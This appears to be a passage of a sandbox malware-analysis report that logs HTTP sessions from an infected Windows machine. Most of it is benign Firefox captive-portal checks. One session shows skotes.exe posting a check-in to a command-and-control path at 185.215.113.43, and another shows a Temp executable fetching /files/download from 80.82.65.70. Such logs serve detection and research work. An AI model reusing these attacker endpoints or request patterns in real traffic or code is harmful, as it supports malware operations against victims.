                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:28.553236008 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80268
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:38.636756897 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:42.447063923 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:42.762168884 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80282
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:43.657648087 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:43.972187996 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80283
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:54.031176090 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:04.231925011 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:10.197185993 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:10.511945963 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80310
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:20.537024975 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:30.740710020 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:40.939429045 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:51.139799118 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:01.343208075 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:11.527777910 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:32.086339951 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:32.401231050 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80392
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:45.244756937 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:45.559775114 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 14:37:40 GMT
                                                                                                                                                                                                                                                Age: 80405
                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                Data Ascii: success


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                60192.168.2.45042280.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:46.560988903 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: C
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:50.682907104 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:50 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 30
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                61192.168.2.450425185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:47.157905102 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:48.460309982 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:48 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                62192.168.2.45042734.107.221.8280
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:47.279609919 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:48.368048906 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75742
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:48.491061926 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:48.806590080 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75742
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:48.984153032 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:49.299654961 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75743
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:50.636147022 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:50.951461077 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75744
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:55.322601080 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:55.638478994 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75749
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:04.221110106 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:04.537774086 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75758
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:06.162215948 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:06.477838039 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75760
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:12.074120045 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:12.391069889 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75766
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:13.535752058 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:13.850949049 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75767
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:16.082294941 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:16.397452116 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75770
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:26.443140984 CET6OUTData Raw: 00
